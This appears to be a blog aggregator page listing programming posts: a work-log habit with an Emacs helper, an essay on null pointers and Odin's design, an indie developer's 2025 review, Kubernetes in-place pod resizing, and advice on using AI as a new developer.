Posts in Java (20 found)
Fredrik Meyer 3 days ago

Writing a work log

About a year ago I started writing a “work diary”. The process is simple: at the end of the day, I write a few sentences about what I did that day at work. It has a few benefits:

It is easier to know what I should do the next day if I didn’t finish a task.

If I’m stuck on something, I can write the problem down, effectively rubber-ducking with myself. I have a belief that writing a problem down will help clarify thoughts.

I can ask an LLM questions about what I have spent time on. Here I use the llm CLI tool by Simon Willison. Asked what technologies I work with, it answered with a list like: Java, Spring Boot, API development, test automation, microservices, CI/CD (Continuous Integration/Continuous Deployment). Or this one, when asked to estimate my level: “Based on the extensive work logs, collaboration with team members, involvement in complex debugging, API development, feature implementation, and participation in meetings and project management, it can be estimated that the programmer is at a senior level.”

It can help me realize issues I should focus more or less on. Asking the LLM again, it pointed out that a lot of time is spent fixing bugs or attending meetings. It suggested setting aside dedicated time for deep work, so that complex coding tasks can be handled without interruption.

It gives me some traceability. I can verify that I did actually work on a particular day, or that I worked on a particular thing on a particular day.

I use Emacs for Org Mode and for Magit. To write the log I press 1 to open the “work Org Mode file”, navigate to the work diary (headlines are “Work log”, month, day), insert the current date, and write a few sentences. Here’s an example from last Friday (loosely translated): “Sleepy today. Deployed § 11-4 second part to the dev environment, fixed a small bug (it didn’t consider manual income). Otherwise spent time on unrelated small fixes. Used Copilot to get ktor-openapi-generator to support -annotations. Made a Grafana dashboard for error logs per app.” I have a small helper for this in my Emacs config.
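A minimal sketch of what such a helper might look like (the function name and file path here are illustrative placeholders, not the actual config):

```elisp
(require 'org)

;; Hypothetical reconstruction: jump to the work Org file and
;; start today's entry with an inactive Org date stamp.
(defun my/work-log ()
  "Open the work Org file and insert today's date as a new entry."
  (interactive)
  (find-file "~/org/work.org")                  ; assumed location
  (goto-char (point-max))
  (insert "*** ")
  (org-insert-time-stamp (current-time) nil t)  ; inactive timestamp
  (newline))
```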

Ginger Bill 4 days ago

Mitigating the Billion Dollar Mistake

This article is a continuation of: Was it really a Billion Dollar Mistake?. After reading a lot of the comments on numerous social media sites about the original article, I think I need to clarify a lot more.

A lot of commenters based their complaints on their experience with languages like Java/C#/Python/etc, and the issues with null-pointer-exceptions (NPEs) in them. What I think a lot of people seemed to forget is that in those languages, virtually everything is a pointer, unlike in a language like C/Go/Odin which has explicit pointers. When everything is a pointer, it is exponentially more likely that you will hit a pointer that is invalid. And in the case of a managed (garbage collected) language, that invalid pointer will most definitely be a null pointer. This is why I can understand the problem of having null pointers in such languages. But I think this still missed the point of what I was trying to state: the reason null even exists in those languages is because you can declare a variable without an explicit initialization value.

Because you can declare such a thing in a language like Java, there are three options to try and mitigate this design flaw:

Allow for null pointers (and just deal with it).
Make all pointers implicitly maybe types (e.g. references in Java).
Require explicit initialization of every element everywhere, so that null cannot happen, along with things like maybe types.

Unfortunately existing languages like Java cannot have these problems solved, but newer languages that want to style themselves similarly could solve them. One of the issues is that languages like Java added maybe/option/optional types too late AND they are not the default behaviour. The first approach is the current status quo, the second approach keeps the implicit value declarations but adds more checks, whilst the third approach requires explicit value declarations.

The enforcement of maybe types as the default pointer/reference type leads to two possibilities:

Requiring each reference to be checked if it is null.
Checking if a value is null and propagating that up the expression tree.

Version 1 amounts to explicit null checks at every use site, but because of the ergonomic pains it can also lead to unwrapping, which is practically equivalent to NPEs. At least with an explicit unwrap, it is a little clearer that a panic could happen. But it can also just be an early-out, like with Odin’s or_return. Version 2 is a bit weirder, since it doesn’t remove the concept of null but propagates it further up the expression tree.

The first approach is unergonomic to use, especially in a language where virtually everything is a pointer/reference, and with the addition of unwrapping which just panics on null, it has practically reinvented NPEs with more steps. As for the second approach, I’d argue it is very bug prone if it was the default, since you cannot trivially know where the null arose from, as it was just passed up the stack 2. Therefore most people think the third approach to mitigating null pointers is the “obvious” and “trivial” approach: explicit individual initialization of every value/element everywhere.

One thing I commonly saw was people saying that I “missed the point”: that null safety is not about protecting from common invalid memory access but rather about clarifying, in the type system itself, the states a pointer can be in, whether it cannot be null or maybe it could be null. I already knew this, and I find it bizarre 3 that people did not understand that from the article. The point I was trying to get across, which most people seemed to either ignore or not understand, was that the approach of requiring explicit initialization of every element everywhere comes with costs and trade-offs. Most people who bring this up as “the solution” think there is either no cost or that the cost is worth it.
The former group are just wrong, and the latter group is who the article was aimed at in the first place: you don’t actually understand the costs fully if you are answering the way that you do. I understand this sounds “condescending” to some people, but I am not trying to be. The point I am arguing is far from the common view/wisdom, and thus I tried to explain my position. Why would a person listen to someone with a “fringe” view? “Fringe” views are typically wrong in other areas of life, so it makes sense to apply that heuristic to the domain of programming too. I don’t care if people agree with me or not; rather, I wish people would actually understand the argument and then comment.

But as a systems programmer, I deal with memory all the time, and null pointers are the least common kind of invalid memory that I have to deal with; the other kinds are not handled by the type system, nor would they be handled by solving the problems of null. No, this is not saying “well, just because you cannot solve problem X with Y, therefore don’t solve either”; it’s saying that they are different problems, and empirically they differ in severity and in the ways to mitigate them. I am not saying you shouldn’t try to solve either problem if you are designing your own language, but rather that both are kinds of invalid memory whose mitigations are completely different in kind 4.

For a managed language like Java, the cost of explicit initialization of every element everywhere is so little in comparison to the rest of the language that the approach is honestly fine. But for a language like the one I have designed and created, Odin, the cost of non-zero initialization is extremely costly as things scale. This simple/naïve approach of explicitly initializing each element looks like the pseudo-C sketch at the end of this section. But if you use a lot of pointers everywhere, the initialization becomes a lot more complex, and non-linear too.

People argue the need to express non-nullable pointers, and either version 1 of the previous approach or this explicit approach are effectively the only ways of doing this. You could tell the compiler to assume the pointer is never null (e.g. with compiler-specific attributes), but those are not guarantees in the type system, just you telling the compiler to assume it is never null. Non-nullability is not possible outside of those two approaches.

This was the entire point I was making with the Individual-Element Mindset versus the Group-Element Mindset: the individual-element mindset lends itself well to thinking about individual elements like this, and as such, it doesn’t really register how the cost of thinking in individual elements compounds into something expensive. I’ve been in projects where a lot of a program’s time is spent in the destructors/Drop traits of individual elements, when all they are doing is trivial things which could have been trivially done in bulk. Most people don’t consider these as “costs”, nor that there are trade-offs to this approach to programming; rather it’s “just the way it is”.

There is the other aspect that if explicit initialization is applied to every type, not just ones which contain pointers/references, it can be less ergonomic to type and adds visual noise 5. This constant syntactic noise can be tiring and detracts from what is actually going on. With the implicit zero initialization that I have in Odin, it has worked out really well. Many might expect it to be confusing, but it isn’t; you can rely on it, and it becomes very natural to use.
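Here is a sketch in that spirit (the Entity struct and its fields are my invention, not the article’s original code):

```c
#include <stdlib.h>

typedef struct Entity Entity;
struct Entity {
    float   x, y;
    int     health;
    Entity *target; /* may be null */
};

/* Individual-element mindset: every field of every element is
   initialized explicitly, one at a time. */
Entity *make_entities(size_t count) {
    Entity *entities = malloc(count * sizeof(Entity));
    for (size_t i = 0; i < count; i++) {
        entities[i].x      = 0.0f;
        entities[i].y      = 0.0f;
        entities[i].health = 100;
        entities[i].target = NULL;
    }
    return entities;
}

/* Group-element mindset: one bulk zeroing of the whole allocation. */
Entity *make_entities_bulk(size_t count) {
    return calloc(count, sizeof(Entity));
}
```

The contrast is the point: the per-field version grows with every new field and every new pointer, while the bulk version stays a single line regardless.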
As the creator and main architect of Odin, a lot of Odin’s design has been about fixing a lot of the problems I and many others faced with C, whilst not veering too far from the general feel of C. Odin does have nil pointers by default, but in practice they are a very rare problem due to numerous features and constructs of the language.

One of the reasons pointers are so pervasive in C is the lack of a proper array type. Odin has proper array types and does not implicitly demote arrays to pointers. Odin has slices which replace a lot of the need for pointers and pointer arithmetic, and because array types (including slices) are bounds checked, that already solves many of the problems that would have occurred in C when treating pointers as arrays, which may or may not have an associated length to check against.

Odin also has tagged unions and multiple return values. Tagged unions should be “obvious” to the people who had been complaining about the initial article, but the use of tagged unions isn’t necessarily there to solve the nil pointer problem. Odin’s Maybe is an example of a maybe/option type, which is just a built-in discriminated union, with the following definition: Maybe :: union($T: typeid) {T}. And due to the design of Odin’s union, if a union only has one variant and that variant is any pointer-like type, no explicit tag is stored: the state of the pointer-like value also represents the state of the union. This means that a Maybe of a pointer type costs no more space than the pointer itself.

Another reason why C has problems with pointers is the lack of a way to state that a parameter to a procedure is optional. C doesn’t have default values for parameters, nor any way in its type system to express this. C’s type system is just too poor and too weak. This is why people unfortunately use pointers as a way to do this, since they can just pass NULL. However, it is rare to see Maybe used for pointers in Odin code except when interfacing with foreign code, or for optional parameters to a procedure. This is because the need for a nil pointer itself is quite rare. There are multiple reasons why:

Odin has slice types.
Odin has multiple return values to allow for out-only parameters, which can be ignored with _.
Odin isn’t an “everything is a pointer” kind of language: pointers have to be explicitly typed to exist.
Writing pointer types as value declarations is less common due to type inference: an inferred declaration is much more common than spelling the pointer type out.

However, one of the main reasons why pointers are rarely a problem in Odin is multiple return values. Multiple return values, when used in this manner, are akin (but not semantically equivalent) to something like a result type in other languages 6. When a procedure returns a pointer, it is either assumed to never be nil OR it is accompanied by another value indicating its validity, commonly a boolean or an error value (see the sketch at the end of this section). And coupled with constructs such as or_else and or_return and named return values, a lot of those issues never arise. Odin is designed around multiple return values rather than result/option constructs, but this approach does in practice solve the same kinds of problems.

Before people go “well, the assumption is not enforced in the type system”, remember where all of this derives from: Odin allows for declarations of variables without an explicit initialization value. And as the designer of Odin, I think enforcing that is both quite a high cost (see the individual-element vs grouped-elements mindsets) and far from the original approach to programming C. I know this is not going to convince people; it’s effectively trying to make someone think like another person, which is never easy, let alone always possible in the first place. And it’s not a mere “aesthetic preference” either. This very little design decision has MASSIVE architectural consequences which lead to numerous performance problems and maintenance costs as a project grows.
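That pointer-plus-validity pattern, sketched (find_user and User are illustrative names of mine, not code from the article):

```odin
package example

import "core:fmt"

User :: struct {
	name: string,
}

// The returned pointer is accompanied by a boolean indicating validity.
find_user :: proc(id: int) -> (user: ^User, ok: bool) {
	if id == 42 {
		u := new(User)
		u.name = "admin"
		return u, true
	}
	return nil, false // not found: nil pointer, ok = false
}

use_it :: proc() {
	// The `if` initializer scopes the checked result, so the pointer
	// is only visible where it has been verified.
	if user, ok := find_user(42); ok {
		fmt.println(user.name)
	}
}
```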
Null pointer exceptions (NPEs) are in a category of constructs in a language which I class as “panic/trap on failure”. What I find interesting is that there are numerous other things in this category, but many people will normally take a different approach to those constructs compared to NPEs, due to whatever reason or bias they have.

The canonical example is integer division by zero. Instinctively, what do you think division by zero of an integer should result in? I’d argue most people will say “trap”, even if a lot of modern hardware (e.g. ARM64 and RISC-V) does not trap, and only the more common x86-related architectures do. Odin does currently 7 define the behaviour of division by zero to “trap” only because of this assumption, but we have considered changing this default behaviour. Odin does allow the programmer to control this behaviour at a global level or on a per-file basis if they want a different behaviour for division by zero (and, consequently, modulo by zero). But some languages such as Pony, Coq, Isabelle, etc. actually define division by zero of an integer to be 0. This is because it can help a lot in theorem provers. But there is the other question of production code. One of the main arguments against NPEs (especially in languages like Java) is that they cause a crash. So in the case of division by zero, do you want that to happen? Or would you prefer all integer division to be explicitly handled, or to default to a predictable/useful value like 0, which prevents crashing in the first place?

Another common example of “panic on failure” is runtime bounds checking. If an index is out of bounds, most languages just panic. It’s rare to find a language that returns a maybe/option value on every array access to prevent an out-of-bounds. Not even languages like OCaml do this. NPEs, division by zero (if it traps), and runtime bounds checking are all examples of this kind of “panic on failure”, but people rarely treat them as being the same, even though they are the same kind of problem.

Do I find null pointers to be a big problem in practice? Honestly, no. I understand it might be common for beginners to a language like C to have many pointer-related problems, but they will also have loads of other problems too. However, as you get more competent at programming, that kind of problem is honestly the least of your problems. I honestly think a lot of this discussion is fundamentally a misunderstanding of different perspectives rather than anything technical. A lot of what some people think are their “technical opinions” are merely aesthetic judgements. And to be clear, aesthetic judgements are not bad, but they are not necessarily technical. But I’d argue most people are not applying their opinions consistently when it comes to the category of “panic on failure”, and NPEs are no different; they only seem more of a problem either because of the name, the “Billion Dollar Mistake”, or because they encounter them more often.

I know a lot of people view the explicit individual initialization of every element everywhere approach as the “obvious solution”, as it seems like low-hanging fruit. As a kid, I was told not to pick low-hanging fruit, especially anything below my waist: just because it looks easy to pick, a lot of it may have been left unpicked for a reason. That does not mean you should or should not pick that fruit, but rather that you need to consider the trade-offs.
If you honestly think the costs of explicit individual initialization of every element everywhere are worth it for the language you are working in or developing, then great! But at least know the trade-offs of that approach. For Odin, I thought it was not worth the cost, compared to the alternative ways of mitigating the problem empirically.

Null pointer dereferences are empirically the easiest class of invalid memory addresses to catch at runtime, and the least common kind of invalid memory address that happens in memory-unsafe languages. I do think null was a costly mistake, but the “obvious solutions” to the problem are probably just as costly, if not more so, in very subtle ways which most people neglected to understand in the article 1. I think that even if Tony Hoare hadn’t “invented” null pointers, someone else would have within a couple of years; I don’t think it’s a “mistake” the programming world was ever going to avoid. To be clear, I am talking about languages that run on modern systems with virtual memory, not embedded systems where you interact with physical memory directly (those platforms, in my opinion, need much different kinds of languages, which unfortunately do not exist yet). I was also talking about languages akin to C and Odin, not languages that run on a VM or have “everything be a reference”.

Footnotes:

1. Most of the bad criticisms just came from people who didn’t read the article or didn’t read past a couple of paragraphs. That’s why I wanted to state this comment very clearly.
2. This is partially why I do not like exceptions as error handling in many languages. It is not obvious where things are thrown/raised from, and they encourage the practice of ignoring them until the latest possible place. I discuss that problem in The Value Propagation Experiment Part 2.
3. I understand what type systems do and their benefits, and it is a little insulting when people assume my knowledge (or lack thereof) without doing a modicum of review.
4. In the case of the other invalid memory addresses, linear/affine substructural type systems with lifetime semantics can help with this (e.g. Rust), but they come at another cost in terms of language ergonomics and restrictions. Language design is hard.
5. I know typing is never the bottleneck in programming, but the visual noise aspect is a big one when you are trying to scan (not necessarily read) code. I want to see the pattern and not be swamped with syntactic noise.
6. I know a result type is a kind of sum type and multiple return values are more akin to a product type, but given how different languages want to be used and expressed, this works out fine in practice for the same kinds of problems. Please don’t give me an FP rant.
7. At the time of writing, I am not sure which approach is the better one, trap or zero by default, but we allow for all four options in the Odin compiler. Division by zero for floats results in “Inf”, and that’s not necessarily as much of a problem in practice, so why would integer division by zero be as bad?


Good Morning Jan 8 2026

Hello all. I just finished the Core 2 part of the CompTIA A+ exam, and I can finally breathe. School has also been out for winter break, but between moving, parties, and holiday cheer, I have yet to post. No doubt I've been thinking about posting, though. I have two posts in drafts and more ideas on the shelf to visit. I have in fact been reading the posts of everyone on my feed as well, even if I haven't been replying. We'll see how much time I can find to post when my Spring semester rolls around 👀


Tyrannies and servilities

In an effort to understand the then-present state of women in the workplace, Virginia Woolf goes looking to the newspapers, where she finds a number of letters and articles declaiming that women have too much liberty, that they are taking jobs that men could do, and that they are neglecting their domestic duties in the process. She finds an immediate parallel to those complaints in other events of the day: There, in those quotations, is the egg of the very same worm that we know under other names in other countries. There we have in embryo the creature, Dictator as we call him when he is Italian or German, who believes that he has the right whether given by God, Nature, sex or race is immaterial, to dictate to other human beings how they shall live; what they shall do. Let us quote again: “Homes are the real places of the women who are now compelling men to be idle. It is time the Government insisted upon giving work to more men, thus enabling them to marry the women they cannot now approach.” Place it beside another quotation: “There are two worlds in the life of the nation, the world of men and the world of women. Nature has done well to entrust the man with the care of his family and the nation. The woman’s world is her family, her husband, her children, and her home.” One is written in English, the other German. But where is the difference? Are they not both saying the same thing? Are they not both the voices of Dictators, whether they speak English or German, and are we not all agreed that the dictator when we meet him abroad is a very dangerous as well as a very ugly animal? And he is here among us, raising his ugly head, spitting his poison, small still, curled up like a caterpillar on a leaf, but in the heart of England. Is it not from this egg, to quote Mr Wells again, that “the practical obliteration of [our] freedom by Fascists or Nazis” will spring? The first quotation is from the Daily Telegraph; the second is Hitler. (I would draw comparisons to the present moment, but they seem to draw themselves.) Woolf later concludes: It suggests that the public and the private worlds are inseparably connected; that the tyrannies and servilities of the one are the tyrannies and servilities of the other. That is, the tyranny of government is the tyranny of the workplace is the tyranny of the home. Each begets and creates the other. But perhaps that also suggests the reverse: pull the thread on one, and watch as they all come undone.

xenodium 2 weeks ago

My 2025 review as an indie dev

In 2024, I took the leap to go indie full-time. By 2025, that shift enabled me to focus exclusively on building tools I care about, from a blogging platform, iOS apps, and macOS utilities, to Emacs packages. It also gave me the space to write regularly, covering topics like Emacs tips, development tutorials for macOS and iOS, a few cooking detours, and even launching a new YouTube channel. The rest of this post walks through some of the highlights from 2025. If you've found my work useful, consider sponsoring. Now let's jump in.

For well over a decade, my blogging setup consisted of a handful of Elisp functions cobbled together over the years. While they did the job just fine, I couldn't shake the feeling that I could do better, and maybe even offer a blogging platform without the yucky bits of the modern web. At the beginning of the year, I launched LMNO.lol. Today, my xenodium.com blog proudly runs on LMNO.lol. LMNO.lol blogs render pretty much anywhere (Emacs and terminals included, of course). 2026 is a great year to start a blog! Custom domains totally welcome.

Sure, there are plenty of journaling and note-taking apps out there. For one reason or another, none of them stuck for me (including my own apps). That is, until I learned a thing or two from social media. With that in mind, Journelly was born: like tweeting, but for your eyes only. With the right user experience, I felt compelled to write things down all the time. Saving to Markdown and Org markup was the mighty sweet cherry on the cake.

As a Japanese language learning noob, what better way to procrastinate than by building yet another Kana-practicing iOS app? Turns out, it kinda did the job. Here's mochi invaders, a fun way to practice your Kana.

2025 brought us the likes of Claude Code, Gemini CLI, Goose, Codex, and many more AI/LLM CLI agents. While CLI utilities have their appeal, I wanted a native Emacs integration, so I simply ignored agents for quite some time. I was initially tempted to write my own Emacs agent, but ultimately decided against it. My hope was that agent providers would somehow converge to offer editor integration, so I could focus on building an Emacs integration while leveraging the solid work from the many teams producing agents. With LLM APIs historically fragmented, my hope for agent convergence seemed fairly far-fetched. To my surprise, ACP (Agent Client Protocol) was announced by Zed and Google folks. This was the cue I had been waiting for, so I set out to build acp.el, a UX-agnostic elisp library, followed by an actual client: agent-shell. I'm fairly happy with how agent-shell's been shaping up. It's my most popular package from 2025, receiving lots of user feedback. If you're curious about the feature-set, I've written about agent-shell's progress from early on:

agent-shell 0.25 updates
agent-shell 0.17 improvements + MELPA
agent-shell 0.5 improvements
Introducing Emacs agent-shell (powered by ACP)
Introducing acp.el
So you want ACP (Agent Client Protocol) for Emacs?

While agent-shell is the new kid on the block, chatgpt-shell received DeepSeek, Open Router, Kagi, and Perplexity support, in addition to a handful of other improvements and bugfixes.

While most of what I share usually ends up as a blog post, this year I decided to try something new. I started the Bending Emacs YouTube channel and posted 8 episodes:

Bending Emacs - Episode 1: Applying CLI utils
Bending Emacs - Episode 2: From vanilla to your flavor
Bending Emacs - Episode 3: Git clone (the lazy way)
Bending Emacs - Episode 4: Batch renaming files
Bending Emacs - Episode 5: Ready Player Mode
Bending Emacs - Episode 6: Overlays
Bending Emacs - Episode 7: Eshell built-in commands
Bending Emacs - Episode 8: completing-read

Enjoying the content? Leave me a comment or subscribe to my channel.

While I enthusiastically joined the Emacs Carnival, I didn't quite manage monthly posts. Having said that, when I did participate, I went all in, documenting my org experience over the last decade.
Ok well… I also joined in with my elevator pitch ;)

While migrating workflows to Emacs makes them extra portable across platforms, I've also accumulated a bunch of tweaks enhancing your Emacs experience on macOS.

While we're talking macOS, I typically like my desktop free from distractions, which includes hiding the status bar. Having said that, I don't want to lose track of time, and for that I built EverTime, an ever-present floating clock (available via Homebrew). Emacs ships with a perfectly functional world clock, available via M-x world-clock, but I wanted a little more, so I built time-zones. Also covered in:

time-zones now on MELPA. Do I have your support?
Emacs time-zones

For better or worse, I rely on WhatsApp Messenger. Migrating to a different client or protocol just isn't viable for me, so I did the next best thing and built wasabi, an Emacs client ;) While not a trivial task, wuzapi and whatsmeow offered a huge leg up. I wanted tighter Emacs integration, so I upstreamed a handful of patches to add JSON-RPC support, plus easier macOS installation via Homebrew. Details covered in a couple of posts:

WhatsApp from you know where
Want a WhatsApp Emacs client?

While both macOS and iOS offer APIs for generating URL previews, they also let you fetch rich page metadata. I built rinku, a tiny command-line utility, and showed how to wire it all up via eshell for a nifty shell experience. With similar magic, you can get a neat experience elsewhere too.

I always liked the idea of generating some sort of art or graphics from a code base, so I built one, a utility to transform images into character art using text from your codebase. Also covered in a short blog post.

Emacs is just about the perfect porcelain for command-line utilities. With little ceremony, you can integrate almost any CLI tool. Magit remains the gold standard for CLI integration. While trimming videos doesn't typically spring to mind as an Emacs use case, I was pleasantly surprised by the possibilities.

While I've built my fair share of Emacs packages, I'm still fairly new at submitting Emacs features upstream. This year, I landed my send-to (aka sharing on macOS) patch. While the proposal did spark quite the discussion, I'm glad I stuck with it. Both Eli and Stefan were amazingly helpful. This year, I also wanted to experiment with dictating into my Emacs text buffers, but unfortunately dictation had regressed in Emacs 30. Bummer. But hey, it gave me a new opportunity to submit another patch upstream.

Ready Player, my Emacs media-playing package, received further improvements like starring media (via Emacs bookmarks), enabling further customizations, and other bug fixes. I also showcased a tour of its features.

Hope you enjoyed my 2025 contributions. Sponsor the work.
Stats for 2025:

Commits: 1,095
Issues created: 37
PRs reviewed: 106
Average commits per day: ~3

Projects:

EverTime - An ever-present clock for macOS
acp.el - An ACP implementation in Emacs lisp
agent-shell - A native Emacs buffer to interact with LLM agents powered by ACP
diverted - Identify temporary Emacs diversions and return to original location
emacs-materialized-theme - An Emacs theme derived from Material
homebrew-evertime - EverTime formula for the Homebrew package manager
homebrew-one - Homebrew recipe for one
homebrew-rinku - Homebrew recipe for rinku
one - Transform images into character art using text from your codebase
rinku - Generate link previews from the command line (macOS)
time-zones - View time at any city across the world in Emacs
video-trimmer - A video-trimming utility for Emacs
wasabi - A WhatsApp Emacs client powered by wuzapi and whatsmeow

Posts:

Journelly 1.3 released: Hello Markdown!
agent-shell 0.25 updates
Bending Emacs - Episode 8: completing-read
At one with your code
Bending Emacs - Episode 7: Eshell built-in commands
Rinku: CLI link previews
Bending Emacs - Episode 6: Overlays
WhatsApp from you know where
Want a WhatsApp Emacs client? Will you fund it?
Bending Emacs - Episode 5: Ready Player Mode
agent-shell 0.17 improvements + MELPA
time-zones now on MELPA. Do I have your support?
Bending Emacs - Episode 4: Batch renaming files
Emacs time-zones
Bending Emacs - Episode 3: Git clone (the lazy way)
agent-shell 0.5 improvements
Bending Emacs - Episode 2: From vanilla to your flavor
Bending Emacs - Episode 1: Applying CLI utils
Introducing Emacs agent-shell (powered by ACP)
Introducing acp.el
So you want ACP (Agent Client Protocol) for Emacs?
Diverted mode
Who moved my text?
Dired buffers with media overlays
Brisket recipe
A tiny upgrade to the LLM model picker
Emacs elevator pitch
Emacs as your video-trimming tool
macOS dictation returns to Emacs (fix merged)
Writing experience: My decade with Org
Interactive ordering of dired items
Patching your Homebrew's Emacs Plus (macOS)
Emacs send-to (aka macOS sharing) merged upstream
Mochi Invaders now on the App Store
Markdown is coming to Journelly
EverTime available via Homebrew
Journelly 1.2 released
Ranking Officer now on the App Store
Awesome Emacs on macOS
Journelly 1.1 released
LLM text chat is everywhere. Who's optimizing its UX?
A richer Journelly org capture template
Journelly: like tweeting but for your eyes only (in plain text)
Journelly vs Emacs: Why Not Both?
The Mac Observer showcases Journelly
Journelly open for beta
DeepSeek, Open Router, Kagi, and Perplexity join the chat
Keychron K3 Pro: F1-F12 as default macOS keys
E-ink bookmarks
Sourdough bookmarks
Cardamom Buns recipe
A tour of Ready Player Mode
A platform that moulds to your needs
Blogging minus the yucky bits of the modern web

alikhil 2 weeks ago

Kubernetes In-Place Pod Resize

About six years ago, while operating a large Java-based platform in Kubernetes, I noticed a recurring problem: our services required significantly higher CPU and memory during application startup. Heavy use of Spring Beans and AutoConfiguration forced us to set inflated resource requests and limits just to survive bootstrap, even though those resources were mostly unused afterwards. This workaround never felt right. As an engineer, I wanted a solution that reflected the actual lifecycle of an application rather than its worst moment.

I opened an issue in the Kubernetes repository describing the problem and proposing an approach to adjust pod resources dynamically without restarts. The issue received little discussion but quietly accumulated interest over time (13 👍 reactions). Every few months, an automation bot attempted to mark it as stale, and every time, I removed the label. This went on for nearly six years… until the release of Kubernetes 1.35, where the In-Place Pod Resize feature was marked as stable.

In-Place Pod Resize allows Kubernetes to update CPU and memory requests and limits without restarting pods, whenever it is safe to do so. This significantly reduces unnecessary restarts caused by resource changes, leading to fewer disruptions and more reliable workloads. For applications whose resource needs evolve over time, especially after startup, this feature provides a long-missing building block. The new resizePolicy field is configured in the pod spec, per container.

While it is technically possible to change pod resources manually, doing so does not scale. In practice, this feature should be driven by a workload controller. At the moment, the only controller that supports in-place pod resize is the Vertical Pod Autoscaler (VPA). There are two enhancement proposals that enable this behavior:

AEP-4016: Support for in-place updates in VPA, which introduces the InPlaceOrRecreate update mode.
AEP-7862: CPU Startup Boost, which is about temporarily boosting a pod by giving it more CPU during startup. This is conceptually similar to the approach proposed in my original issue.

An example Deployment and VPA using both AEP features is sketched at the end of this post. With such a configuration, the pod will have doubled CPU requests and limits during startup. During the boost period, no resizing will happen. Once the pod reaches the Ready state, the VPA controller scales CPU down to the currently recommended value. After that, VPA continues operating normally, with the key difference that resource updates are applied in place whenever possible.

Does this feature fully solve the problem described above? Only partially. First, most application runtimes still impose fundamental constraints: Java and Python runtimes do not currently support resizing memory limits without a restart. This limitation exists outside of Kubernetes itself and is tracked in the OpenJDK project via an open ticket. Second, Kubernetes does not yet support decreasing memory limits, even with In-Place Pod Resize enabled. This is a known limitation documented in the enhancement proposal for memory limit decreases. As a result, while In-Place Pod Resize effectively addresses CPU-related startup spikes, memory resizing remains an open problem.

In-Place Pod Resize provides a foundation for new capabilities like startup boost and makes use of the VPA more reliable. While important gaps remain, such as memory decrease support and a scheduling race condition, this change represents a meaningful step forward.
For workloads with distinct startup and steady-state phases, Kubernetes is finally beginning to model reality more closely.
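A sketch of such a Deployment and VPA (the container resizePolicy field and the InPlaceOrRecreate update mode are documented; the startupBoost stanza follows AEP-7862 and its final field names may differ):

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: java-app                        # hypothetical workload name
spec:
  selector:
    matchLabels: {app: java-app}
  template:
    metadata:
      labels: {app: java-app}
    spec:
      containers:
      - name: app
        image: example/java-app:latest  # hypothetical image
        resources:
          requests: {cpu: "500m", memory: "1Gi"}
          limits:   {cpu: "1",    memory: "1Gi"}
        resizePolicy:                   # allow in-place CPU resize
        - resourceName: cpu
          restartPolicy: NotRequired
---
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: java-app-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: java-app
  updatePolicy:
    updateMode: "InPlaceOrRecreate"     # AEP-4016: resize in place when possible
  resourcePolicy:
    containerPolicies:
    - containerName: app
      startupBoost:                     # AEP-7862 sketch; check the proposal
        cpu:
          factor: 2                     # double CPU during startup
```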

Dan Moore! 3 weeks ago

What New Developers Need to Know About Working with AI

It’s been a few years since I wrote Letters to a New Developer, about what I wish I’d known when I was starting out. The industry has changed with the advent and acceleration of generative AI and the implications of these tools for coding and software creation. So I wanted to write a quick update to give advice to developers who are entering this world with AI.

It’s important to understand what developers actually do. They are not responsible for writing code. They are not responsible for liking technology. Like other employees, developers are responsible for taking their particular skill set and using it to solve problems that a business or organization needs solved. Whether that’s a one-person shop organizing their customers’ data or a large organization like Walmart, Amazon or the US military trying to improve their logistics, there are goals to achieve. For a developer, building, maintaining and improving software is the main means to achieve those goals. This does not change in the world of AI. The role of a developer is still to understand technology, how it can be applied, where its limits are, and to build it with the quality and appropriate flexibility for the business situation.

What do I mean by the last part? If you’re building a script to transfer data from one system to another one time, then a throwaway script that doesn’t have error checking, that doesn’t have proper variable names, that doesn’t have abstraction is appropriate. If, on the other hand, you’re creating foundational architectural components of a long-lived system, you need to think about all the things that make software more maintainable. In either case, as a developer your role is clear. It’s not to code the software. It’s to take the business requirements, understand the domain and build a solution that meets the business’s requirements for a given level of flexibility, complexity and completeness. That job doesn’t change whether you’re using:

machine code
assembly
a non-memory managed language like C
a memory managed language like Java
or spec-driven development

As a dev, your job is to understand the technical trade-offs, use the right tools and meet the business or organization’s needs.

Now, as a new developer, how do you learn to leverage genAI in a way that is going to help your career rather than hurt it? It’s tough out there to get a job as a new dev, and ignoring AI is going to make it even tougher. It’s important that you learn how to use this tool and use it well. But AI as a tool is much more like Google search results than it is like a compiler error. A compiler error is deterministic and will give you the same message each time you compile the code. The output of an LLM is not deterministic, just as when you search for guidance on building software on Stack Overflow or ask your team. With these sources of knowledge, you as a developer need to learn judgment. You need to learn when to trust genAI and when not to trust it. Do this by starting small, asking for links, and checking the output of an AI against other sources, including other AIs and published documentation. You’re building your sense of judgment and intuition about the system you are improving. Use AI to augment your understanding, not replace it. When an AI hallucinates, don’t throw the baby out with the bathwater and never touch genAI again. Instead, learn to sniff out when an AI is generating garbage and when it is generating helpful code that will accelerate things. A good course of action is to use AI to generate easily verifiable code where errors are low impact.
An example is writing tests with AI, especially unit tests, especially in a statically typed language. It’s very easy to tell if the tests that are written are working or not. Don’t forget to instruct the AI to fully flesh out the tests; you don’t want any “return true” nonsense.

Another example is read-only queries. If you have an understanding of the data, you can verify whether or not the SQL the LLM creates gives you the correct answer. Write multiple queries because they are so low effort, and use them to double-check answers. If you were looking for a count of a particular set of customers, ask in multiple different ways, including a count of one particular kind of customer and a count of all customers grouped by type. This lets you see if things match up (a concrete sketch follows at the end of this post).

The goal is not trusting blindly but instead using the tool to accelerate delivery of solutions to the problems the business wants you to solve. But you want to do so in a way that gives you confidence that the solutions you deliver are real. By the way, the value of such intuition and judgement is high for all developers. I think it’s even more valuable for newer developers.

If you would like to purchase my book, “Letters To a New Developer”, for more of this kind of insight, there’s a sale going on right now through the end of the year. You can use this link to buy my book for just $24. (This is a better deal than I get with my author’s discount.)
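A concrete version of that cross-check (assuming a hypothetical customers table with a type column; not from the original post):

```sql
-- Direct answer: count one particular kind of customer
SELECT COUNT(*) FROM customers WHERE type = 'premium';

-- Cross-check: count all customers grouped by type;
-- the 'premium' row should agree with the first query
SELECT type, COUNT(*) AS n FROM customers GROUP BY type;
```

If the numbers disagree, at least one of the generated queries is wrong, which is exactly the signal you want before trusting either.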

./techtipsy 1 month ago

Drawing parallels between home renovation and software development

